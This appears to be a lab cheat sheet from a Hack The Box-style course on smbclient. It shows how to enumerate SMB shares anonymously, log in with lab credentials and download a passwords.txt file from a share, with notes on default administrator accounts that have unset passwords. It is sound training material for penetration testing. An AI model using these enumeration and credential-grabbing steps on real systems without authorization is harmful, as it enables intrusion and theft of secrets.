SMBCLIENT
INSTALLATION
root@oco:~$ sudo apt install smbclient
LISTING SHARES: PASSWORD MISCONFIGURATION
#test whether the server have password misconfiguration
root@oco:~$ smbclient -h
root@oco:~$ smbclient -L {\\\\targetIP} -U {userName}
* the -L flag is used to list available server shares on the target.
* the -U flag is used to specify the Login identity to use.
- misconfigured smb servers typically have administrator as the username
with an unset password
LISTING SHARES: W/O PASSWORD
root@oco:~$ smbclient -h
root@oco:~$ smbclient -N -L \\\\10.129.42.253
Sharename Type Comment
-------- ---- -------
print$ Disk Printer Drivers
users Disk
IPC$ IPC IPC Service (gs-svcscan server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
* the -N (null session) is used for anonymous access
- it suppresses the input of existing users or valid passwords - password prompt
- the -N MUST come before the -L
* the -L is used to list available shares on the target
* the print$ and an IPC$ are included by default in the basic setting (if configured)
ACCESSING SHARES: W/ FULL CREDENTIALS
root@oco:~$ smbclient \\\\10.129.150.91\\users -U bob%Welcome1
* MUST list shares first prior to connecting with credentials
- the use of back slashes can be used as well
- //10.129.150.91//users
Enter WORKGROUP\<username>'s password:
Anonymous login successful
Try "help" to get a list of possible commands.
CONNECTION: W/ PASSWORD
root@oco:~$ smbclient //10.129.150.91/users -U bob%Welcome1
Try "help" to get a list of possible commands.
* MUST list shares first prior to connecting with credentials
- smbclient needs a share path, like //IP/SHARE.
- Without a share, it doesn't know what to connect to.
* can use backslash instead of forward slashes
- \\\\10.129.150.91\\users -U bob%Welcome1
smb: \> ls
. D 0 Thu Feb 25 16:42:23 2021
.. D 0 Thu Feb 25 15:05:31 2021
bob D 0 Thu Feb 25 16:42:23 2021
4062912 blocks of size 1024. 1332480 blocks available
smb: \> cd bob
smb: \bob\> ls
. D 0 Thu Feb 25 16:42:23 2021
.. D 0 Thu Feb 25 16:42:23 2021
passwords.txt N 156 Thu Feb 25 16:42:23 2021
4062912 blocks of size 1024. 1332480 blocks available
smb: \bob\> get passwords.txt
getting file \bob\passwords.txt of size 156 as passwords.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
root@oco:~$ cat passwords.txt
...
CONNECTION W/O PASSWORD
root@oco:~$ smbclient //10.129.202.5/sambashare
Password for [WORKGROUP\htb-ac-53539]:
Try "help" to get a list of possible commands.
smb: \>
* after listing share, test whether connection to the share is possible
- this is only possible if anonymous login is enabled or if there's a misconfiguration
DOWNLOADING FILES
The smbclient allows for the execution of local system commands (non-target side)
smb: \> get prep-prod.txt
getting file \prep-prod.txt of size 71 as prep-prod.txt (8,7 KiloBytes/sec)
(average 8,7 KiloBytes/sec)
smb: \> !ls
prep-prod.txt
smb: \> !cat prep-prod.txt
[] check your code with the templates
[] run code-assessment.py
[] …
* the "!" followed by a cmd can be used to execute local system commands (non-target side)
- this will not interrupt the connection.
EXECUTING LOCAL SYSTEM CMDS
The !<cmd>
in smbclient will run a command in the local shell without leaving the smbclient
interactive prompt. This executes on the system, not on the SMB server connected to. This is useful as it saves time when you want to manipulate local files (e.g., listing directories, moving files) while still staying inside the smbclient
session.
//list local files while connected to the target
smb: \> !ls
notes.txt exploit.c loot/
Last updated